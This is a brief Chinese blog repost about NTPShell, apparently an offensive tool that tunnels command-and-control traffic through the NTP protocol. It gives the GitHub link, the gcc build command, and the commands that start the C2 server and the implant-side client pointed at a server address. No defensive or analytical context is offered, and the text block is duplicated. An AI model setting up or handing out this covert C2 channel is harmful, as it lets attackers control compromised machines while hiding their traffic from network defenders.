NTPShell
NTPShell
获取地址:https://github.com/aplyc1a/NTPShell
通过NTP协议来负载C2数据。
编译
gcc ntp.c -lpthread -o ntp
使用
c2服务端:./ntp -S
c2被控端:./ntp -C -s {server_addr}
本文来自博客园,作者:ZapcoMan,转载请注明原文链接:https://www.cnblogs.com/ZapcoMan/p/18454883
获取地址:https://github.com/aplyc1a/NTPShell
通过NTP协议来负载C2数据。
编译
gcc ntp.c -lpthread -o ntp
使用
c2服务端:./ntp -S
c2被控端:./ntp -C -s {server_addr}
本文来自博客园,作者:ZapcoMan,转载请注明原文链接:https://www.cnblogs.com/ZapcoMan/p/18454883